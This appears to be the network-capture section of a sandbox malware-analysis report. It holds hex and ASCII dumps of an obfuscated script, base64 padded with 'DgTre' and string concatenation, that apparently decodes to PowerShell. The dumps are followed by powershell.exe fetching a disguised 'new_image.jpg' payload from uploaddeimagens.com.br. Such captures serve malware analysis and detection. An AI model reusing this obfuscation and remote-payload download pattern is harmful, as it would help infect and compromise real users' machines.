2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 Data Ascii: zDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & passarinha
2024-05-27 16:35:27 UTC	1087	IN	Data Raw: 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f Data Ascii: ssarinha & regulador & passarinha & "gDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & passarinha & regulador & passarinha & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & passarinha & regulado
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 31 36 38 38 0d 0a 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 Data Ascii: 1688gTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & passarinha & regulador & passarinha & "DgTreBJDgTreG4DgTre" & passarinha & regulador & passarinha & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" &
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 Data Ascii: gTre" & passarinha & regulador & passarinha & "DgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre" & passarinha & regulador & passarinha & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTr
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 65 58 51 42 64 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 48 51 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 43 44 67 54 72 65 46 49 44 67 54 72 65 4c 77 44 67 54 72 65 77 44 67 54 72 65 44 67 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 43 38 44 67 54 72 65 4e 67 44 67 54 72 65 31 44 67 54 72 65 44 45 44 67 54 72 65 4c 67 44 67 54 72 65 33 44 67 54 72 65 44 63 44 67 54 72 65 4d 51 44 67 54 72 65 75 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 44 67 44 67 54 72 65 4f 51 44 67 54 72 65 78 44 67 54 72 65 43 38 44 67 54 72 65 4c 77 44 67 54 72 65 36 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 64 44 Data Ascii: eXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49173	188.114.97.3	443	3620	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 16:35:32 UTC	124	OUT	GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-05-27 16:35:32 UTC	702	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:32 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Tue, 21 May 2024 16:07:14 GMT ETag: "664cc6b2-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 209 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nd8yELhEnaTW2%2Fd%2BzuZNyjDYqsLMQRKfOvfDb9zWzF5WcCSoIzugK20M03Hg1x5DsvQpTdZRyDs%2F5sqdfAmQJKUFofx7tiJJu372Tr25O%2FvqsYBoBnxtzMGrLp396GPkV%2B%2BeYmlFwg2%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a76b301bbe78d6-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 16:35:32 UTC	667	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: d5 d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-05-27 16:35:32 UTC	1369	IN	Data Raw: 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 Data Ascii: Z@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49174	188.114.97.3	443	3620	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 16:35:36 UTC	100	OUT	GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1 Host: uploaddeimagens.com.br
2024-05-27 16:35:36 UTC	698	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:36 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Tue, 21 May 2024 16:07:14 GMT ETag: "664cc6b2-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 213 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhjWVBIQSjbmC7Z5le7%2B2hEtoRpScnecJcXOeEHOekjElt7%2Bh%2Fnf2%2BRkv01Vsj4BugfpiPF704dhX%2FDxuGZ9WxYPHKspivBBexyICNKc7pxprFaT4edggRgIaljl1esTxdJyC0tagh5P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a76b4aeca942ec-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 16:35:36 UTC	671	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
